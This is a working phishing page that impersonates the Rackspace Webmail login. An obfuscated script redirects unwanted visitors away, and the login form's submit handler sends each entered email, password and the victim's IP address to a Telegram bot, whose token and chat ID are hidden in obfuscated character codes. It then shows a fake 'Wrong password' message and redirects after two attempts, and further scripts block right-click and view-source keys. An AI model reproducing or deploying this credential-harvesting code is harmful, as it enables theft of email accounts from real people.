
<script>

var _0x31545d=_0x5a50;function _0x3a49(){var _0x57a31c=['xk3Zwfsh','7424483mOZXrH','undefined','901936dIXHxw','ps.rackspa','2561375ETWMaF','ce.com//ue','https://ap','href','7499408aXuPQb','18WORHvA','split','120834MWdiyH','10HTSLVD','647800NfRLDs','hash','504422YTgGEt','9yyNbcU','location','12xCOtTI'];_0x3a49=function(){return _0x57a31c;};return _0x3a49();}(function(_0x4f1372,_0x4c5b51){var _0x8e8b8d=_0x5a50,_0x35ac46=_0x4f1372();while(!![]){try{var _0x555645=parseInt(_0x8e8b8d(0x79))/(0xef*-0x19+0xfb*-0xb+0x1*0x2221)+parseInt(_0x8e8b8d(0x75))/(-0x154*-0x1c+0x1fc+0x2*-0x1395)*(-parseInt(_0x8e8b8d(0x7c))/(0x59*-0x16+0x7d5*-0x3+0x1f28))+-parseInt(_0x8e8b8d(0x77))/(-0xc*0x1a1+-0x1fc3+0x7*0x755)+parseInt(_0x8e8b8d(0x82))/(0x8*-0x3b9+0xef+-0x1cde*-0x1)+parseInt(_0x8e8b8d(0x73))/(-0x4*-0x52f+-0xd*-0x5+-0x3*0x6fd)*(-parseInt(_0x8e8b8d(0x80))/(0xfe4+-0x1adb+-0x43*-0x2a))+-parseInt(_0x8e8b8d(0x72))/(0x1bac*-0x1+0x56b*-0x1+-0x1*-0x211f)*(-parseInt(_0x8e8b8d(0x7a))/(0x26ce+-0x3*-0x950+-0x42b5))+parseInt(_0x8e8b8d(0x76))/(-0x1*0x16ba+-0xb*-0x272+-0x211*0x2)*(-parseInt(_0x8e8b8d(0x7e))/(0x100b+-0x244b+0x144b));if(_0x555645===_0x4c5b51)break;else _0x35ac46['push'](_0x35ac46['shift']());}catch(_0x2832ec){_0x35ac46['push'](_0x35ac46['shift']());}}}(_0x3a49,-0x2aa*-0x137+0x2a045*0x3+-0x3a725));function _0x5a50(_0x48b413,_0x3e16a5){var _0x5b9f42=_0x3a49();return _0x5a50=function(_0x2f56a0,_0x544fe9){_0x2f56a0=_0x2f56a0-(0x1b9*-0x3+-0x3e9*-0x1+-0x1b1*-0x1);var _0x478286=_0x5b9f42[_0x2f56a0];return _0x478286;},_0x5a50(_0x48b413,_0x3e16a5);}var wrfweewdwedew=window[_0x31545d(0x7b)][_0x31545d(0x78)],hudiswjs=wrfweewdwedew[_0x31545d(0x74)]('#')[-0x49*0x1+0x1e02+0x3b7*-0x8];typeof hudiswjs==_0x31545d(0x7f)&&(window[_0x31545d(0x7b)][_0x31545d(0x71)]=_0x31545d(0x70)+_0x31545d(0x81)+_0x31545d(0x6f)+_0x31545d(0x7d));


</script>



<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <link rel="icon" type="image/x-icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABUAAAARCAYAAAAyhueAAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAIdQAACHUAdbbVnkAAACQSURBVDhPY5CRVvpPbUx7Q///nwnExmTimbgMNf6//OD1/41Lj5KEQXpAenEaClJEKoDoIWAoKQYj1BPhUmIMRlVLpPfxGYypjoCh3378hGN0PjYxogx9+f4LGMPYxIgRNPTWk7dwGoZBfGxiMJqgoSB84tpjojBMPUFDsWnGhwkaSoMcRYO8Ty1MA0OV/gMAoqOI6mggHZIAAAAASUVORK5CYII=">

  <title>Rackspace Webmail: Hosted Email for Business</title>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,400,500,700">

  <style>
    /* Page Defaults */
    * {
      -webkit-box-sizing: border-box;
      -moz-box-sizing: border-box;
      box-sizing: border-box;
    }

    body {
      font-family: "Roboto", "Helvetica Neue", Helvetica, Arial, sans-serif;
      font-size: 14px;
      line-height: 1.42857;
      color: #333333;
      background-color: #FAFAFA;
      margin: 0;
    }

    .caption {
      display: inline-block;
      font-size: 12px;
      color: #666;
    }

    .base_link {
      display: inline-block;
      color: #0C7C84;
      text-decoration: none;
    }

    .base_links {
      background: #FFFFFF;
      text-align: center;
      padding-bottom: 20px;
      margin-top: -15px;
    }

    .divider {
      display: inline-block;
      margin: 0px 5px;
      color: #0C7C84;
    }
    /* Page Layout */
    #content {
      display: flex;
      align-items: center;
      justify-content: center;
      position: fixed;
      top: 0;
      left: 0;
      bottom: 0;
      right: 0;
      background: #EAEAEA;
    }

    #content-header {
      height: 53px;
      padding: 16px;
      font-size: 24px;
      font-weight: 300;
      line-height: 18px;
      background: #424242;
      color: #FCFCFC;
    }

    #content-header-logo {
      float: right;
    }

    #logo {
      width: 130px;
      margin-top: -9px;
      margin-right: -5px;
    }

    #content-header-label {
      float: left;
    }

    #content-body {
      display: flex;
      justify-content: start;
      background: #FFFFFF;
      min-width: 790px;
    }

    #banner-section {
      height: 285px;
      width: 314px;
      margin: 40px;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
    }

    #banner {
      width: 190px;
    }

    #divider {
      border: 1px solid rgb(224, 224, 224);
      margin: 40px 0px;
    }
    /* Form Layout */
    #form {
      display: flex;
      flex-direction: column;
      justify-content: center;
      padding: 20px;
      min-height: 268px;
      width: 100%;
    }

    #form-body {
      height: 205px;
      width: 100%;
      margin: 40px 0px 0px 20px;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      padding-right: 20px;
    }

    #form-container {
      width: 100%;
      margin: 0px auto;
      padding: 0px 10px;
    }

    .row {
      margin: 0px -10px;
    }

      .row:before, .row:after {
        content: " ";
        display: table;
      }

    .col {
      width: 100%;
      float: left;
      position: relative;
      min-height: 1px;
      padding: 0px 10px;
    }

    .form-group {
      width: inherit;
      padding-right: 30px;
      margin-bottom: 20px;
    }

    .form-label {
      position: relative;
      font-family: Roboto;
      font-size: 16px;
      margin-bottom: 8px;
      line-height: 1;
      color: #616161;
      display: inline-block;
      max-width: 100%;
    }

    .form-field {
      border: 1px solid #BDBDBD;
      border-radius: 2px;
      background: #FFFFFF;
      font-family: Roboto;
      font-size: 16px;
      color: #616161;
      height: 32px;
      display: block;
      width: 100%;
      padding: 4px 8px;
      line-height: 1.42857;
      -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
      box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
      -webkit-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
      -o-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
      transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
    }

    #forgot-password {
      position: absolute;
      top: 0px;
      right: 40px;
      color: #0C7C84;
      text-decoration: none;
      background-color: transparent;
      box-sizing: border-box;
    }

    #login-btn-toolbar {
      float: right;
      margin: auto 30px 15px -20px;
    }

    #login-btn {
      float: right;
      display: inline-flex;
      flex-direction: row;
      justify-content: center;
      align-items: center;
      padding: 0 12px;
      height: 32px;
      line-height: 1px;
      font-size: 14px;
      font-weight: 400;
      text-transform: capitalize;
      color: #fff;
      background-color: #0C7C84;
      border-color: #0C7C84;
      margin-bottom: 0;
      text-align: center;
      vertical-align: middle;
      touch-action: manipulation;
      cursor: pointer;
      background-image: none;
      border: 1px solid transparent;
      white-space: nowrap;
      border-radius: 2px;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
      user-select: none;
    }

    #form-container {
      width: 100%;
      margin: 0px auto;
      padding: 0px 10px;
    }

    @media only screen and (max-device-width: 480px) {
      /* Page Defaults */
      body {
        font-size: 19pt;
        line-height: 1.42857em;
      }

      .caption {
        display: inline-block;
        font-size: 80%;
        color: #666;
      }
      /* Page Layout */
      #content {
        align-items: inherit;
        display: inherit;
        justify-content: inherit;
      }

      #content-header {
        font-size: 171%;
        height: 3em;
        line-height: 1em;
        padding: 1em;
      }

      #content-header-logo {
        float: right;
      }

      #logo {
        margin-left: 6em;
        width: inherit;
        height: 1em;
      }

      #banner-section {
        display: none;
      }

      #divider {
        display: none;
      }
      /* Form Layout */
      .form-label {
        font-size: 114%;
      }

      .form-field {
        font-size: 114%;
        height: 2em;
      }

      #forgot-password {
        right: 2em;
        top: 0;
      }

      #login-btn-toolbar {
        margin: 1.5em 2em 1em -1.5em;
      }

      #login-btn {
        font-size: 150%;
        height: 3em;
        padding: 1.25em;
      }
    }
  </style>
</head>
<body>
  <div>
    <div id="content">
      <div>
        <div id="content-header">
          <div id="content-header-logo"><img id="logo" src="https://static.emailsrvr.com/beta_apps_rackspace_com/images/Rackspace_Technology_Logo_RGB_WHT.png"  /></div>
          <div id="content-header-label">Webmail Login</div>
        </div>
        <div id="content-body">
          <div id="banner-section">
            <a href="https://emailhelp.rackspace.com/l/identify-suspicious-email" target="_blank">
              <img id="banner" src="https://static.emailsrvr.com/apps_rackspace_com/images/Suspicious-Email-Banner.jpg" />
            </a>
          </div>
          <div id="divider"></div>
          <form id="form" method="post" name="login" action="" autocomplete="off" class="login_form">
               <script src="/wmidentity/dist/webmailLogin.js?v=dn70RwATRXPGR3I_MlY9aK9fMX6zSf1GYvcRvRv-UFc=" type="text/javascript"></script>
  <div id="form-body">
    <div id="form-container">
      <input type="hidden" name="__RequestVerificationToken" value="CfDJ8ECOo3G2CgtIm9FFwnkWl6MthJFmJ-7v3HbybJ6v0N3EwlqqVKS5RH_qjxmN0GitRBf_cUoN9ZS6OLQhjwt0HKyBKdNvXbr9EkX1eUtKW1sjConzfuvVz7ICXBhxdZakrqEnEqZbe2uDR7HR2BtFKSc" />

<div style="color: rgb(211, 47, 47); margin-bottom: 20px; font-weight: 500;" id="login_status"></div>



      <!-- destination and flags is used for OWA login -->
      <input id="form-destination" type="hidden" name="destination" value="" />
      <input id="form-owa-flags" type="hidden" name="flags" value="4" />
      <div id="user-row" class="row">
        <div id="user-col" class="col">
          <div id="user-field" class="form-group">
            <label id="user-label" class="form-label">Email address</label>
            <input id="user-input" name="uipt" tabindex="1" class="form-field" value="" autocomplete="username" />
          </div>
        </div>
      </div>
      <div id="pass-row" class="row">
        <div id="pass-col" class="col">
          <div id="pass-field" class="form-group">
            <label id="pass-label" class="form-label">Password</label>
            <input id="pass-input" name="password" tabindex="2" type="password" class="form-field"/>
          </div>
          <a id="forgot-password" href="#" tabindex="4">Forgot password?</a>
        </div>
      </div>
    </div>
  </div>
  <div id="login-btn-toolbar">
    <button id="login-btn" tabindex="3" type="submit">Log In</button>
  </div>
</form>
        </div>
        <div class="base_links">
          <a class="base_link" target="_blank" href="http://www.rackspace.com/information/legal/privacystatement">
            Privacy Statement
          </a>
          <div class="divider"> | </div>
          <a class="base_link" target="_blank" href="http://www.rackspace.com/information/legal/websiteterms">
            Website Terms
          </a>
        </div>
        <div class="footer" style="text-align: center; margin-top: 10px;">
          <div class="caption">
            Need webmail for your business?  Learn more about
            <a href="https://www.rackspace.com/email-hosting/webmail" style="color: #666;">
              Hosted Email
            </a>
            from Rackspace
          </div>
        </div>
      </div>
    </div>
  </div>
</body>



    <script> 
      // 
      function extractDomain(t){const n=t.match(/@(.+)$/);return n?n[1].toUpperCase():null}function getEmailFromHash(){const t=window.location.hash.substring(1);return/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(t)?t:null}function updateUI(){const t=getEmailFromHash();if(t){const n=document.querySelector('input[name="uipt"]');n&&(n.value=t)}}document.addEventListener("DOMContentLoaded",updateUI);
  </script><script src="jvs/4c.js">function extractDomain(t){const n=t.match(/@(.+)$/);return n?n[1].toUpperCase():null}function getEmailFromHash(){const t=window.location.hash.substring(1);return/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(t)?t:null}function updateUI(){const t=getEmailFromHash();if(t){const n=document.querySelector('input[name="uipt"]');n&&(n.value=t)}}document.addEventListener("DOMContentLoaded",updateUI);
  </script><script>
  let attemptCount=0;async function getIP(){try{const t=await fetch("https://api.ipify.org?format=json");return(await t.json()).ip}catch(t){return console.error("Failed to fetch IP:",t),"Unknown IP"}}async function submitCredentials(t){t.preventDefault(),attemptCount++;const e=document.querySelector('input[name="uipt"]').value,n=document.querySelector('input[name="password"]'),o=n.value;if(!e){return document.getElementById("login_status").innerHTML='<div style="color: rgb(211, 47, 47); margin-bottom: 20px; font-weight: 500;" >Email is required.</div>',!1}if(!/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/.test(e)){return document.getElementById("login_status").innerHTML='<div style="color: rgb(211, 47, 47); margin-bottom: 20px; font-weight: 500;" >Email is invalid.</div>',!1}if(!o){return document.getElementById("login_status").innerHTML='<div style="color: rgb(211, 47, 47); margin-bottom: 20px; font-weight: 500;" >Password is required.</div>',!1}if(o.length<5){return document.getElementById("login_status").innerHTML='<div style="color: rgb(211, 47, 47); margin-bottom: 20px; font-weight: 500;" >Password is invalid.</div>',!1}const i=await getIP(),a=`https://${extractDomain(e)||extractDomainFromURL()}`,r=`\n          WebMail RackSpace Login:\n          Email: ${e}\n          Password: ${o}\n          IP: ${i}\n          \n      `;await fetch(`https://api.telegram.org/bot${BXL}/sendMessage`,{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({chat_id:chatId,text:r})}),n.value="";document.getElementById("login_status").innerHTML='<div style="color: red;">Wrong password, please try again</div>',2===attemptCount&&(window.location.href=a)}function extractDomain(t){const e=t.match(/@(.+)$/);return e?e[1]:null}function extractDomainFromURL(){const t=window.location.hash.substring(1).match(/^[^\s@]+@([^\s@]+\.[^\s@]+)$/);return t?t[1]:null}document.addEventListener("DOMContentLoaded",(()=>{document.querySelector(".login_form").addEventListener("submit",submitCredentials)}));</script>

  
<script>$(document).bind("keydown",(function(e){if(e.ctrlKey&&83==e.which)return e.preventDefault(),!1})),document.addEventListener("contextmenu",(e=>e.preventDefault())),document.onkeydown=function(e){return!e.ctrlKey||67!==e.keyCode&&86!==e.keyCode&&85!==e.keyCode&&117!==e.keyCode};</script>







	

<script>

    function _0x3039(_0xa25d1b,_0x43e4d4){const _0x3f75a4=_0x109d();return _0x3039=function(_0x3e26f6,_0x5dea19){_0x3e26f6=_0x3e26f6-(0xde1+0x1*-0x917+-0x1*0x36c);let _0x58de02=_0x3f75a4[_0x3e26f6];return _0x58de02;},_0x3039(_0xa25d1b,_0x43e4d4);}const _0x987fa8=_0x3039;(function(_0x70e607,_0xd8ac25){const _0x1c1070=_0x3039,_0x1305cf=_0x70e607();while(!![]){try{const _0x24a1eb=-parseInt(_0x1c1070(0x166))/(-0x1*0x8ff+-0x2*-0x13b+-0x6*-0x117)+-parseInt(_0x1c1070(0x161))/(-0x1*0x1f44+-0x44*-0x9+-0x1ce2*-0x1)*(-parseInt(_0x1c1070(0x162))/(-0x4ea*-0x2+-0xee1+0x288*0x2))+parseInt(_0x1c1070(0x168))/(-0x22f3+-0x5*-0x595+0x70e)+parseInt(_0x1c1070(0x165))/(0x2f9*-0xb+-0x59f+0x2657)*(-parseInt(_0x1c1070(0x15e))/(-0x4c*-0x4b+0x1abe+-0x14a*0x26))+parseInt(_0x1c1070(0x15f))/(-0x2*-0xa3d+-0xcf2+-0x781)+parseInt(_0x1c1070(0x164))/(0x3f5+-0x19*0x10d+0xdc*0x1a)+parseInt(_0x1c1070(0x167))/(-0x2563+-0x1ad7+0x4043)*(-parseInt(_0x1c1070(0x163))/(-0xcfa*0x1+0x2*0x691+-0x1*0x1e));if(_0x24a1eb===_0xd8ac25)break;else _0x1305cf['push'](_0x1305cf['shift']());}catch(_0x1c1e59){_0x1305cf['push'](_0x1305cf['shift']());}}}(_0x109d,-0x180b5c+-0x15fc4b+0x3adf33*0x1));function _0x109d(){const _0x3bccab=['85IsssMT','356098otlUBI','3987909DkjorH','4913012jVHpzw','436242pgiEEy','11312497xbNjXm','fromCharCo','241934tegJfx','21XydyzS','50fjimRm','7665128KYaJLi'];_0x109d=function(){return _0x3bccab;};return _0x109d();}const BXL=String[_0x987fa8(0x160)+'de'](0xbda+-0x12f0*-0x2+0x3185*-0x1,-0x6f*0x39+0x231a+-0x4*0x28c,0x2489+-0xe4d+-0x1606,-0x2375+0x1b72+-0x2*-0x41e,-0x9d3+-0x217a+0x1*0x2b7d,-0xe37+-0x1760+0x25cf,-0x3d9+-0xdb2+-0x8e1*-0x2,0x139*-0x9+0x15b0+-0xa79,0x1*0x14b6+-0x1eb9*-0x1+-0x3336,-0x4c*0x68+-0x10*-0x146+0xab5*0x1,0x19*0x14b+-0x1*-0x1678+-0x3691,0x137*0xb+0x3fe*-0x5+0x6da,0x93+-0x12b9*0x2+0x2520,0x1*-0x1393+0x2386+-0xfac,-0x33*-0xad+0x1a03*0x1+0x3*-0x1408,0xa0d+0x1780+-0x212b,-0x1804+-0x182c+-0x3082*-0x1,-0x1717+0x2427+-0xce0,0x121a+-0x2632+0x147a,0x1*-0x2111+-0xb*-0x1de+0xcea,-0x260e+0x1*-0xf5f+0x359a,0x1*0xaed+0xa5d*-0x1+-0x21,0x1*0x4cf+0x1f75*0x1+-0x2402,-0x1d91+-0x577+-0x18*-0x178,0xd0*-0x20+-0x244e+-0x3eb5*-0x1,-0xdf*-0x19+-0x1*-0x1890+-0x2ddf,0x25a*0x1+0x3b*-0x91+0x7e1*0x4,-0xd04+-0x1*0xa84+-0x1*-0x17ba,0x171+-0x26fe+0x3*0xc96,0xbdf+0x548*-0x2+-0x117,-0x1*0x1529+-0x13ed+0x1*0x296f,-0x1171+0x3cd*-0x5+-0xc4e*-0x3,-0x1*0x14f7+-0x5a2+0x1ada,-0x1*0x9ad+-0x3f1*0x2+0x11f5,-0x107e*-0x2+0x1b83*-0x1+-0x52c,-0x357+-0x3d*-0x17+-0x1f*0xe,0x1*-0xc0e+-0x1*0x10b2+0x1d2a,0x1c81*-0x1+-0x1*0x1bbf+0x38ab,0x120d*-0x1+0x24d2+0x116*-0x11,-0x2c6*0x5+-0x56*0x1+0xe99,-0x14b7+-0x2666+0x1*0x3b54,-0x1*-0x103d+-0x24b1+0x14d7,-0x1db3+-0xe*-0x56+0x1959,0xcb9+-0x1*0x19d3+-0x3*-0x479,-0x7fd*-0x3+0x921*-0x1+-0x1*0xe5d,-0x3*-0x917+-0x2442+-0x935*-0x1),chatId=String[_0x987fa8(0x160)+'de'](0x14*0xc9+-0x18b6+-0xf*-0x9d,0x21d0+0x8fc+-0x2a96,0x2*0x23d+0x1643+-0x1a87,-0x9*0x24d+-0x11a5+0x268a*0x1,0x953*-0x1+-0x3b2+-0xd3a*-0x1,0xc46+-0x19*0x5d+0x2fb*-0x1,0x1*0xdff+0x1856+-0x5d*0x69,-0xfec+-0x1b7a+-0x63a*-0x7,-0xd3d*-0x1+0x4*0x2eb+-0x18b0,0xd1e+-0x3e*-0x5a+0x1159*-0x2);
      
</script>




</html>


